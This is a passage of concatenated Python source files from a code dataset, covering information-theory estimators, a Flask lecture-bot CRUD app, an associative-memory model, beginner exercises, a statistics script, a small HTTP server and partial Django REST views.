\"\"\"\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n ks = _check_ks(ks, ar)\n if ks.ndim == 0:\n raise CardinalityError('ks cant be a scalar')\n\n if r is not None:\n r = _check_r(r, ar)\n\n data_combinations = combinations(ar, r=r)\n alphabet_size_combinations = (x for x in combinations(ks, r=r))\n return (iinfo(*args)\n for args in zip(data_combinations, alphabet_size_combinations))\n\n return iinfo(ar, ks)\n\n\ndef coinformation(ar, ks=None, r=None):\n \"\"\"Coinformation from data matrix.\n\n See Eq.11 in:\n Timme, Nicholas, et al.\n \"Synergy, redundancy, and multivariate information measures:\n an experimentalist's perspective.\"\n Journal of computational neuroscience 36.2 (2014): 119-140.\n\n The coinformation reduces to the entropy for a single variable and to the\n mutual information for a pair of variables.\n\n Parameters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n ks : 1D array of length p, optional\n Alphabet size for each variable.\n r : int or None, optional; 1<=r<=p.\n If passed, return a generator yielding estimates for the p-choose-r\n possible combinations of r variables.\n If r == 1, return the entropy for each variable. If r == 2 return the\n mutual information for each possible pair. If r > 2 return the\n coinformation for each possible subset of length r.\n Combinations are ordered as: list(itertools.combinations(range(p), r)).\n\n Returns\n -------\n float\n Coinformation estimate.\n\n \"\"\"\n\n # change sign for odd number of variables\n return (-1)**ar.shape[0] * interaction_information(ar=ar, ks=ks, r=r)\n\n\ndef mutual_information(ar, ks=None, axis=1):\n \"\"\"Mutual information from p-by-n data matrix.\n\n If p > 2, return an estimate of the mutual information for each possible\n pair of variables, ordered as list(itertools.combinations(range(p), r=2)).\n\n Parameters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n ks : 1D p-dimensional array, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis\n\n Returns\n -------\n float\n Mutual information estimate.\n\n Raises\n ------\n CardinalityError\n If len(ks) != p.\n\n \"\"\"\n\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n p = ar.shape[0]\n\n ks = _check_ks(ks, ar)\n if ks.ndim == 0:\n raise CardinalityError('ks cant be a scalar')\n\n if p > 2:\n h1 = list(from_data(ar, ks=ks, r=1))\n return (h1[i1] + h1[i2] - from_data(ar[[i1, i2]], ks=ks[[i1, i2]])\n for i1, i2 in combinations(range(p), 2))\n\n return numpy.sum(from_data(ar, ks=ks, r=1)) - from_data(ar, ks=ks)\n\n\ndef conditional_entropy(ar, c, ks=None, axis=1, r=None):\n \"\"\"\n Conditional entropy estimate from data matrix.\n\n Parameters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n c : int or array-like\n The variables on which entropy is conditioned (as column indices).\n ks : 1D p-dimensional array, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis\n r : int or None, optional; 1<=r<=p-len(c).\n If passed, return a generator yielding estimates for all possible\n combinations of r variables conditioning on the `c` variables.\n Indices are sorted as:\n list(x for x in itertools.combinations(range(p), r=r+len(c))\n if set(c) <= set(x))\n\n Returns\n -------\n float\n Conditional entropy estimate\n\n \"\"\"\n from itertools import combinations\n\n # check data 
shape\n ar = _check_data(ar, axis)\n\n p = ar.shape[0]\n\n try:\n c = list(c)\n except TypeError:\n c = [c]\n if not set(c) <= set(range(p)):\n raise EstimatorInputError('The indices of conditioning variables'\n ' are not valid')\n\n ks = _check_ks(ks, ar)\n\n # EntropyBasedEstimator objects are callable and return the fitted estimate\n estimator = Entropy()\n\n # Entropy of features on which we are conditioning\n counts = histogram(ar[c])\n hc = estimator(counts, k=ks)\n\n if r is not None:\n if ks.ndim == 0:\n raise CardinalityError('For combinations, ks cant be a scalar')\n\n r = _check_r(r, p - len(c))\n\n # include the c variables in the set\n r = r + len(c)\n\n indices = combinations(range(p), r=r)\n counts_combinations = histogram(ar, r=r)\n alphabet_size_combinations = (numpy.prod(x)\n for x in combinations(ks, r=r))\n return (estimator(*args) - hc for ids, *args in zip(\n indices, counts_combinations, alphabet_size_combinations)\n if set(c) <= set(ids))\n\n counts = histogram(ar)\n return estimator(counts, k=ks) - hc\n\n\ndef _nbins(data):\n \"\"\"\n The number of unique elements along axis 0. If data is p-dimensional,\n the num. of unique elements for each variable.\n \"\"\"\n # reshape as a p-by-n array\n return [len(numpy.unique(v)) for v in data]\n\n\ndef histogram(data, axis=1, r=None):\n \"\"\"Compute a histogram from a data matrix. Wrapper to numpy.unique.\n\n Parameters\n ----------\n data : array-like, shape (p, n)\n A p-by-n array of n samples from p variables.\n axis : int, optional\n The sample-indexing axis. Defaults to 1.\n r : int, optional\n For r values in the interval [1, p],\n return a generator yielding bin counts for each of the p-choose-r\n combinations of r variables.\n\n Returns\n -------\n counts : ndarray\n Bin counts.\n\n \"\"\"\n from itertools import combinations\n\n # check data shape\n data = _check_data(data, axis)\n\n if r is not None:\n r = _check_r(r, data)\n return (histogram(d) for d in combinations(data, r=r))\n\n # statistics for the p-dimensional variable\n _, counts = numpy.unique(data, return_counts=True, axis=1)\n return counts\n\n\ndef _check_data(ar, axis):\n \"\"\"Check that input arrays are non-empty 2D arrays.\"\"\"\n\n ar = numpy.atleast_2d(ar)\n if ar.ndim > 2:\n raise DataArrayError('Input array has %s dimensions; must be 2D' %\n ar.ndim)\n p, n = ar.shape\n if n == 0 or p == 0:\n raise DataArrayError('Empty input array')\n\n if axis == 0:\n ar = ar.T\n\n return ar\n\n\ndef _check_r(r, ar):\n \"\"\"\n Raises\n ------\n CombinationError\n For r values out of the interval [1, p].\n \"\"\"\n if hasattr(ar, 'shape') and ar.shape:\n p = ar.shape[0]\n else:\n p = ar\n if r < 1 or r > p:\n raise CombinationError('r values must be in the interval [1, %s]' % p)\n return r\n\n\ndef _check_ks(ks, ar):\n \"\"\"\n Raises\n ------\n CardinalityError\n If ks is array-like and len(ks) != p.\n \"\"\"\n\n if ks is None:\n # guess from data\n ks = numpy.array([len(numpy.unique(v)) for v in ar])\n else:\n try:\n ks = numpy.float64(ks)\n except ValueError:\n raise CardinalityError('%s: not a valid cardinality' % ks)\n if ks.ndim:\n p = ar.shape[0]\n if len(ks) != p:\n raise CardinalityError('k should have len %s' % p)\n return ks\n\n\ndef iinfo(X, ks):\n \"\"\"Helper function for interaction information definition.\n\n Ref: 
timme2014synergy\n \"\"\"\n info = 0.0\n S = len(X)\n for T in range(1, S + 1):\n sgn = (-1)**T\n info += sgn * numpy.sum(from_data(X, ks=ks, r=T))\n return -info\n\n\ndef is_pmf(a):\n \"\"\"If a is a valid probability mass function.\"\"\"\n a = numpy.float64(a)\n not_negative = numpy.all(a >= 0)\n normalized = numpy.isclose(sum(a), 1.0)\n return not_negative and normalized\n","sub_path":"ndd/nsb.py","file_name":"nsb.py","file_ext":"py","file_size_in_byte":16856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"508311417","text":"from flask import Flask, render_template, request, redirect\n\nfrom LecturebotDAL.repository import Repository, UnitOfWork, ServiceLocator\nfrom LecturebotDAL.models import Role, User, Lecture, UserHasResources, Resource, Component, Attribute\nfrom LecturebotDAL.dbcontext import *\n\nfrom LecturebotAPI.forms import RoleForm, LectureForm, ResourceForm, RoleEditForm, LectureEditForm, ResourceEditForm\n\napp = Flask(__name__)\napp.secret_key = 'development key'\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('navigation.html')\n\n\n@app.route('/role', methods=['GET', 'POST'])\ndef list_roles():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n roles = repository.get_all(Role.Role)\n form = RoleForm.RoleForm(request.form)\n\n if request.method == 'POST':\n new_role = Role.Role(name=form.Name.data, priority=form.Priority.data)\n repository.create(new_role)\n unit_of_work.commit()\n return redirect('/role')\n\n return render_template('role.html', roles=roles, form=form)\n\n\n@app.route('/role/delete/<identity>', methods=['GET'])\ndef delete_role(identity):\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n repository.drop(Role.Role, identity, True)\n unit_of_work.commit()\n return redirect('/role')\n\n\n@app.route('/role/edit/<identity>', methods=['GET'])\ndef edit_role(identity):\n form = RoleEditForm.RoleEditForm()\n form.id.data = identity\n return render_template('roleedit.html', identity=identity, form=form)\n\n\n@app.route('/roleedit', methods=['POST'])\ndef save_changes_role():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n form = RoleEditForm.RoleEditForm(request.form)\n\n new_role = Role.Role(name=form.Name.data, priority=form.Priority.data)\n new_role.Id = form.id.data\n\n repository.update(Role.Role, new_role, form.id.data, True)\n unit_of_work.commit()\n return redirect('/role')\n\n\n@app.route('/user', methods=['GET'])\ndef list_users():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n users = repository.get_all(User.User)\n\n return render_template('user.html', users=users)\n\n\n@app.route('/lecture', methods=['GET', 'POST'])\ndef list_lectures():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n lectures = repository.get_all(Lecture.Lecture)\n form = LectureForm.LectureForm(request.form)\n\n if request.method == 'POST':\n new_lecture = Lecture.Lecture(header=form.Header.data, content=form.Content.data, userlogin=form.Owner.data)\n repository.create(new_lecture)\n unit_of_work.commit()\n return redirect('/lecture')\n\n return render_template('lecture.html', lectures=lectures, form=form)\n\n\n@app.route('/lecture/delete/<identity>', 
methods=['GET'])\ndef delete_lecture(identity):\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n repository.drop(Lecture.Lecture, identity, True)\n unit_of_work.commit()\n return redirect('/lecture')\n\n\n@app.route('/lecture/edit/<identity>', methods=['GET'])\ndef edit_lecture(identity):\n form = LectureEditForm.LectureEditForm()\n form.id.data = identity\n return render_template('lectureedit.html', identity=identity, form=form)\n\n\n@app.route('/lectureedit', methods=['POST'])\ndef save_changes_lecture():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n form = LectureEditForm.LectureEditForm(request.form)\n\n new_lecture = Lecture.Lecture(header=form.Header.data, content=form.Content.data, userlogin=form.Owner.data)\n new_lecture.Id = form.id.data\n\n repository.update(Lecture.Lecture, new_lecture, form.id.data, True)\n unit_of_work.commit()\n return redirect('/lecture')\n\n\n@app.route('/userhasresources', methods=['GET'])\ndef list_resources_of_user():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n resources_of_user = repository.get_all(UserHasResources.UserHasResources)\n\n return render_template('userhasresource.html', usersresources=resources_of_user)\n\n\n@app.route('/resource', methods=['GET', 'POST'])\ndef list_resources():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n resources = repository.get_all(Resource.Resource)\n form = ResourceForm.ResourceForm(request.form)\n\n if request.method == 'POST':\n new_resource = Resource.Resource(url=form.URL.data, description=form.Description.data)\n repository.create(new_resource)\n unit_of_work.commit()\n return redirect('/resource')\n\n return render_template('resource.html', resources=resources, form=form)\n\n\n@app.route('/resource/delete/(<url>)', methods=['GET'])\ndef delete_resource(url):\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n repository.drop(Resource.Resource, url, False)\n unit_of_work.commit()\n return redirect('/resource')\n\n\n@app.route('/resource/edit/(<url>)', methods=['GET'])\ndef edit_resource(url):\n form = ResourceEditForm.ResourceEditForm()\n form.id.data = url\n return render_template('resourceedit.html', identity=url, form=form)\n\n\n@app.route('/resourceedit', methods=['POST'])\ndef save_changes_resource():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n form = ResourceEditForm.ResourceEditForm(request.form)\n\n new_resource = Resource.Resource(url=form.id.data, description=form.Description.data)\n\n repository.update(Resource.Resource, new_resource, form.id.data, False)\n unit_of_work.commit()\n return redirect('/resource')\n\n\n@app.route('/component', methods=['GET'])\ndef list_components():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n components = repository.get_all(Component.Component)\n\n return render_template('component.html', components=components)\n\n\n@app.route('/attribute', methods=['GET'])\ndef list_attributes():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n attributes = repository.get_all(Attribute.Attribute)\n\n return render_template('attribute.html', attributes=attributes)\n\n\n@app.route('/dashboard', methods=['GET'])\ndef 
dashboard():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n resources = repository.get_all(Resource.Resource)\n\n repository = ServiceLocator.ServiceLocator(session, ModelBase, DBEngine)\n res_count = repository.get_count_of_resources_of_user().fetchall()\n\n urls = [str(resource.URL) for resource in resources]\n times = [int(resource.TimesVisited) for resource in resources]\n\n res = [str(resC[0]) for resC in res_count]\n count = [int(resC[1]) for resC in res_count]\n\n return render_template('dashboard.html', x1=urls, y1=times, x2=res, y2=count)\n","sub_path":"Laboratory2/src/LecturebotAPI/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"138807976","text":"\nimport numpy as np\nfrom .gsom import GSOM\nfrom .hebbian import Hebbian, FakeHebbian\nfrom .math_functions import distance, gaussian_field\n\nclass AssociativeMemory:\n\n def __init__(self, map_size=(10, 10), map_expanding=True, use_hebbian=True):\n self._map1 = GSOM(size=map_size, expanding=map_expanding)\n self._map2 = GSOM(size=map_size, expanding=map_expanding)\n\n self._hebbian = FakeHebbian()\n if use_hebbian:\n self._hebbian = Hebbian(\n size1=self._map1.size,\n size2=self._map2.size\n )\n\n @property\n def size1(self):\n return self._map1.size\n\n @property\n def size2(self):\n return self._map2.size\n\n @property\n def learning_rate(self):\n return 0.5 * (self._map1.learning_rate + self._map2.learning_rate)\n\n @learning_rate.setter\n def learning_rate(self, value):\n self._map1.learning_rate = value\n self._map2.learning_rate = value\n\n @property\n def neighborhood_update(self):\n return 0.5 * (self._map1.neighborhood_update\n + self._map2.neighborhood_update)\n\n @neighborhood_update.setter\n def neighborhood_update(self, value):\n self._map1.neighborhood_update = value\n self._map2.neighborhood_update = value\n\n @property\n def neighborhood_insert(self):\n return 0.5 * (self._map1.neighborhood_insert\n + self._map2.neighborhood_insert)\n\n @neighborhood_insert.setter\n def neighborhood_insert(self, value):\n self._map1.neighborhood_insert = value\n self._map2.neighborhood_insert = value\n\n def train(self, stimulus1, stimulus2):\n # Train the two GSOMs with the two stimuli.\n bmu1, direction1 = self._map1.train(stimulus1)\n bmu2, direction2 = self._map2.train(stimulus2)\n\n # Expand the hebbian connections if necessary.\n direction1 is not None and self._hebbian.expand(bmu1, direction1, index=1)\n direction2 is not None and self._hebbian.expand(bmu2, direction2, index=2)\n\n # Train the hebbian connections.\n w1, h1 = self._map1.size\n w2, h2 = self._map2.size\n activation1 = gaussian_field(w1, h1, 1, bmu1, 0.5).reshape((w1, h1))\n activation2 = gaussian_field(w2, h2, 1, bmu2, 0.5).reshape((w2, h2))\n self._hebbian.train(activation1, activation2)\n\n def activate(self, input_stimulus, input_index):\n input_map, output_map = self._get_maps(input_index)\n\n if isinstance(self._hebbian, FakeHebbian):\n return input_map.get_bmu_for_stimulus(input_stimulus)\n else:\n input_activation = input_map.activate(input_stimulus)\n output_activation = self._hebbian.activate(\n input_activation, input_index)\n return output_map.get_bmu_for_activation(output_activation)\n\n def evaluation(self, categories1, categories2):\n # Get list of BMUs and hit map for all categories.\n category1_bmus = self._bmus_for_categories(categories1, 1)\n category2_hits = self._hits_for_categories(categories1, 
1)\n category2_bmus = self._bmus_for_categories(categories2, 2)\n category1_hits = self._hits_for_categories(categories2, 2)\n\n # If not using Hebbian connections, we switch the hit maps to simulate\n # activation on the map itself.\n if isinstance(self._hebbian, FakeHebbian):\n tmp_hits = category1_hits\n category1_hits = category2_hits\n category2_hits = tmp_hits\n\n # Calculate confusion matrices and generalization factors.\n cm1 = self._confusion_matrix(category1_bmus, category1_hits)\n cm2 = self._confusion_matrix(category2_bmus, category2_hits)\n gen1 = np.sum(np.diag(cm1) >= 0.8) / len(cm1)\n gen2 = np.sum(np.diag(cm2) >= 0.8) / len(cm2)\n\n return (\n # Confusion matrix.\n (\n cm1,\n cm2,\n ),\n # Hit map.\n (\n self._hit_map(category1_hits, 1),\n self._hit_map(category2_hits, 2),\n ),\n # Hit count.\n (\n self._hit_count(category1_hits, 1),\n self._hit_count(category2_hits, 2),\n ),\n # Average percent correct.\n (\n np.sum(np.diag(cm1)) / len(cm1),\n np.sum(np.diag(cm2)) / len(cm2),\n ),\n # Percent generalization factors.\n (\n gen1,\n gen2,\n ),\n # Taxonomic factor (generalization factors average).\n 0.5 * (gen1 + gen2),\n )\n\n def _bmus_for_categories(self, categories, input_index):\n input_map, output_map = self._get_maps(input_index)\n bmus = [[] for i in range(len(categories))]\n for category_index, stimuli in enumerate(categories):\n for stimulus in stimuli:\n bmu = input_map.get_bmu_for_stimulus(stimulus)\n bmus[category_index].append(bmu)\n return bmus\n\n def _hits_for_categories(self, categories, input_index):\n hits = dict()\n for category_index, stimuli in enumerate(categories):\n for stimulus in stimuli:\n bmu = self.activate(stimulus, input_index)\n if bmu not in hits:\n hits[bmu] = np.zeros(len(categories))\n hits[bmu][category_index] += 1\n return hits\n\n def _confusion_matrix(self, category_bmus, category_hits):\n matrix = []\n\n for category_index, bmus in enumerate(category_bmus):\n hits = np.zeros(len(category_bmus))\n for bmu in bmus:\n if bmu in category_hits:\n hits += category_hits[bmu]\n else:\n distance_hits = [(distance(bmu_hit, bmu), h)\n for bmu_hit, h in category_hits.items()]\n min_distance = np.min([d for d, h in distance_hits])\n distance_hits = np.stack(\n [h for d, h in distance_hits if d <= min_distance])\n hits += np.sum(distance_hits, axis=0) / len(distance_hits)\n matrix.append(hits / max(1, np.sum(hits)))\n\n return np.stack(matrix)\n\n def _hit_map(self, category_hits, input_index):\n input_map, output_map = self._get_maps(input_index)\n\n hit_map = np.zeros(input_map.size)\n for bmu, hits in category_hits.items():\n hit_map[bmu] = hits.argmax() + 1\n return hit_map\n\n def _hit_count(self, category_hits, input_index):\n input_map, output_map = self._get_maps(input_index)\n\n hit_count = np.zeros(input_map.size)\n for bmu, hits in category_hits.items():\n hit_count[bmu] = np.count_nonzero(hits)\n return hit_count\n\n def _get_maps(self, input_index):\n maps = [self._map1, self._map2]\n map_index = input_index - 1\n if isinstance(self._hebbian, FakeHebbian):\n return (maps[map_index], maps[map_index])\n else:\n return (maps[map_index], maps[1 - map_index])\n","sub_path":"lib/model/associative_memory.py","file_name":"associative_memory.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"282506213","text":"version = \"0.1.0001\"\nprint(version)\nfrom setuptools import setup, find_packages\n\nsetup(\n name='test_release3',\n 
version=version,\n author='Aleksander Cwikla',\n url=\"https://github.com/acwikla-novela/test_release3\",\n packages=find_packages(),\n description='Testing auto-release',\n platforms='Posix; MacOS X; Windows',\n python_requires='==3.7.4',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"227393736","text":"students = ['paul', 'george', 'ringo', 'john']\ngrades = [100,90,50,70]\n\nidx = students.index('ringo')\nprint(grades[idx])\n\n# declare\nstugrades = {\n 'paul': 100,\n 'george': 90,\n 'ringo': 50,\n 'john': 70\n}\n\n# read / access\nprint(stugrades['ringo'])\n\n# add\nstugrades['pete'] = 105\n\n# modify / update\nstugrades['pete'] = 100\n\n# delete\ndel stugrades['george']\ndel stugrades['john']\n# del stugrades['george'], stugrades['john'] # one liner (would raise KeyError here: both keys were already deleted above)\n\nlist(stugrades.keys())\nlist(stugrades) # synonymous\nlist(stugrades.values())\n\nprint('paul' in stugrades)\nprint(100 in stugrades)\nprint(100 in stugrades.values())\n\n\n# CHESS BOARD\n\nboard = {\n 'a1': 'R+', 'b1': 'N+', 'c1': 'B+', 'd1': 'K+',\n 'a2': '', 'b2': '', 'c2': '', 'd2': '',\n 'a3': '', 'b3': '', 'c3': '', 'd3': '',\n 'a4': 'R-', 'b4': 'N-', 'c4': 'B-', 'd4': 'Q+',\n}\nboard['b2']\n\n# move b1 to b2\nboard['b2'] = board['b1']\nboard['b1'] = ''\n\n\n# --------------------\n# | K* | ...\n\nbtempl = '''\n+----+----+----+----+\n|{a1:^4}|{b1:^4}|{c1:^4}|{d1:^4}|\n+----+----+----+----+\n|{a2:^4}|{b2:^4}|{c2:^4}|{d2:^4}|\n+----+----+----+----+\n|{a3:^4}|{b3:^4}|{c3:^4}|{d3:^4}|\n+----+----+----+----+\n|{a4:^4}|{b4:^4}|{c4:^4}|{d4:^4}|\n+----+----+----+----+\n'''\nprint(btempl.format_map(board))\n\n# move b4 to b3\nboard['b3'] = board['b4']\nboard['b4'] = ''\nprint(btempl.format_map(board))\n\n\n# C# had if (expr) { ..... 
}\nval = 3\nif val == 3:\n print('val is equal to 3')\n print('yeah!!!')\nelif val == 4:\n print('val is equal to 4')\n print('yeah!!!')\nelse:\n print('val is NOT equal to 3 or 4')\n print('booooooo!')\nprint('DONE!!')\n\n# boolean operators\n# ==, !=, >, <, >=, <=, in, not in, is, is not\n\n","sub_path":"C/0129.py","file_name":"0129.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"451616686","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport glob\nimport pickle as pkl\nfrom collections import namedtuple\nimport bayesiantests as bt\n\n# Define named tuple that was used to store results.\ncomparePair = namedtuple('comparePair', 'algorithm1 algorithm2 scores')\n\n# Set rope and rho values.\nrope=0.01\nrho=1.0/10.0\n\n# Go over stored results dictionaries in folder.\nfor results in glob.glob('*.p'):\n\n # Load next results dictionary.\n with open(results, 'rb') as f:\n results_nxt = pkl.load(f)\n\n # Go over pair comparisons in dictionary.\n for results_idx in results_nxt.keys():\n nxt_pair = results_nxt[results_idx]\n names = (nxt_pair.algorithm1, nxt_pair.algorithm2)\n scores = nxt_pair.scores\n msk = np.logical_not(np.apply_along_axis(lambda x: np.all(x == 0), 1, scores))\n scores = scores[msk, :]\n\n # Compute probabilities.\n pleft, prope, pright = bt.hierarchical(scores,rope,rho)\n with open('results_bhctt.res', 'a') as f:\n f.write('{0}, {1}, {2}, {3}, {4}\\n'.format(nxt_pair.algorithm1, nxt_pair.algorithm2, pleft, prope, pright))\n\n # Sample posterior and make simplex plot.\n samples=bt.hierarchical_MC(scores,rope,rho, names=('MultiSURF', 'MultiSURF*'))\n fig = bt.plot_posterior(samples, names)\n plt.savefig(nxt_pair.algorithm1 + '_' + nxt_pair.algorithm2 + '.png')\n\n","sub_path":"evaluation_results/bayesian_hierarchical_correlated_t_test.py","file_name":"bayesian_hierarchical_correlated_t_test.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"124898426","text":"import random\r\n\r\nnum1 = random.randint(0,999)\r\nnum2 = random.randint(0,999)\r\n\r\ndef main():\r\n print(' ', num1)\r\n print('+', num2)\r\n ans = int(input('Enter your answer: '))\r\n check_answer(num1, num2, ans)\r\n\r\ndef check_answer(num1, num2, ans):\r\n if num1 + num2 == ans:\r\n print('Congrat!! Your answer is correct!!!')\r\n else:\r\n print('Wrong answer!! 
The answer is', num1 + num2)\r\nmain()\r\n","sub_path":"Chap 5/Exercise/math_quiz.py","file_name":"math_quiz.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"550291495","text":"#!/usr/bin/python3.5\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport threading, pickle, re, subprocess, urllib, pathlib\n\n\nclass MyHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n f_type_map = {'.html': 'text/html', '.css': 'text/css', '.ico': 'image/x-icon', '.jpg': 'image/jpeg',\n '.png': 'image/png', '.js': 'application/javascript'}\n t_type = re.compile('\\/|(\\.\\w*)')\n r_file = self.path.split('?')\n requested_type = t_type.findall(self.path)\n ex = requested_type[-1]\n if ex != '.py':\n res = 200\n fileToSend = None\n hds = []\n root = pathlib.PurePath('/home/jack/onedrive/LaptopProjects/LED science project/files')\n f = root.joinpath(r_file[0].strip('/'))\n if not pathlib.Path(f).exists():\n res = 404\n elif pathlib.Path(f).is_dir():\n if pathlib.Path(f / 'index.html').exists():\n f = f / 'index.html'\n with open(str(f), 'r') as file:\n fileToSend = file.read()\n hds.append(('content-type', 'text/html'))\n else:\n res = 404\n else:\n try:\n with open(str(f), 'r') as file:\n fileToSend = file.read()\n hds.append(('content-type', f_type_map[ex]))\n except UnicodeDecodeError:\n with open(str(f), 'rb') as file:\n fileToSend = file.read()\n hds.append(('content-type', f_type_map[ex]))\n if res == 200:\n self.send_response(res)\n else:\n self.send_error(res)\n for item in hds:\n i1, i2 = item\n self.send_header(i1, i2)\n self.end_headers()\n if fileToSend is not None:\n try:\n self.wfile.write(fileToSend.encode('utf-8'))\n except AttributeError:\n self.wfile.write(fileToSend)\n return\n else:\n try:\n with open('C:\\\\Users\\jackt.JACK-IS-AWESOME\\OneDrive\\LaptopProjects\\LED science project\\\\files\\params.dat', 'wb') as file:\n d = dict()\n for pair in list(r_file[1].split('&')):\n key, value = pair.split('=')\n d[key] = str(value)\n pickle.dump(d, file)\n except IndexError:\n pass\n self.send_response(200)\n self.send_header('Content-Type', 'text/html')\n self.end_headers()\n file = subprocess.run(['python3.5', '/home/jack/projects/server/files%s' % r_file[0]],\n stdout=subprocess.PIPE)\n self.wfile.write(file.stdout)\n\n def do_POST(self):\n pass\n\n def do_OPTIONS(self):\n methods = ['GET', 'POST', 'PUT', 'HEAD', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE']\n sup_methods = []\n self.send_response(200)\n for m in methods:\n if hasattr(self, 'do_' + m):\n sup_methods.append(m)\n else:\n pass\n print(sup_methods)\n meth = ', '.join(sup_methods)\n self.send_header('Allow', meth)\n self.end_headers()\n\n\naddresses = list()\n\naddresses.append(('localhost', 9898))\n\n\ndef run():\n print('starting server ...')\n httpd = HTTPServer(addresses[0], MyHandler)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n\n\n'''def run1():\n httpd = HTTPServer(addresses[1], MyHandler)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass'''\n\n\nbg_server = threading.Thread(target=run)\n#bg_server1 = threading.Thread(target=run1)\nif __name__ == '__main__':\n bg_server.start()\n# bg_server1.start()\n for addr in addresses:\n print('\\nserver started at %s:%s' % addr)\n","sub_path":"local/Science-Project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 
+{"seq_id":"196120210","text":"# Засько Богдан\n# КНИТ16-А\n# №18; Последовательность чисел Фибоначчи, конечное из которых не более чем\n# целое число N\n\nwhile True:\n N=input(\"Введите целый ограничитель для числа Фибоначчи: \")\n if N.isdigit():\n N=int(N)\n y=[1,1]\n for i in range(2,N):\n y.append(y[i-2]+y[i-1])\n if y[i]>=N:\n y.remove(y[i])\n break\n print(\"Последовательность Фибоначчи\",y )\n print()\n else:\n print(\"Введите целое положительное число!\")\n cont=input(\"Для продолжения введите yes, для завершения любое другое значение \\n\")\n if cont==\"yes\":\n print(\"\")\n continue\n else:\n break\n","sub_path":"laba5/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"381679222","text":"import random\r\n\r\nRow = int(input(\"How many heads in a row?\"))\r\nTries = 0\r\nHeads = 0\r\nwhile Heads < Row:\r\n Coin = random.randrange(0, 2)\r\n if Coin == 0:\r\n Heads = 0\r\n elif Coin == 1:\r\n Heads += 1\r\n Tries += 1\r\n\r\nprint(\"It took\", Tries, \"tries.\")\r\n","sub_path":"Further Coin Test.py","file_name":"Further Coin Test.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"641731949","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom rest_framework import generics\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework import mixins\nfrom rest_framework import viewsets\nfrom rest_framework.exceptions import PermissionDenied\nfrom django.contrib.auth.models import User\n\nfrom heritages.models import Heritage, Multimedia, Annotation\nfrom heritages.search import search_heritages, search_annotations\nfrom heritages.serializers import HeritageSerializer, MultimediaSerializer, AnnotationSerializer, UserSerializer, \\\n AnnotationPaleSerializer\nfrom heritages.permissions import IsOwner, IsNotAnonymous, IsSelf\n\n\nclass HeritagesListView(generics.ListCreateAPIView):\n queryset = Heritage.objects.all()\n serializer_class = HeritageSerializer\n\n def list(self, request, *args, **kwargs):\n keyword = self.request.query_params.get(\"keyword\", None)\n if not keyword:\n return super().list(request, *args, **kwargs)\n\n result = Response(search_heritages(keyword)).data\n return Response(i[\"_source\"] for i in result[\"hits\"][\"hits\"])\n\n\nclass HeritageView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Heritage.objects.all()\n serializer_class = HeritageSerializer\n\n\nclass 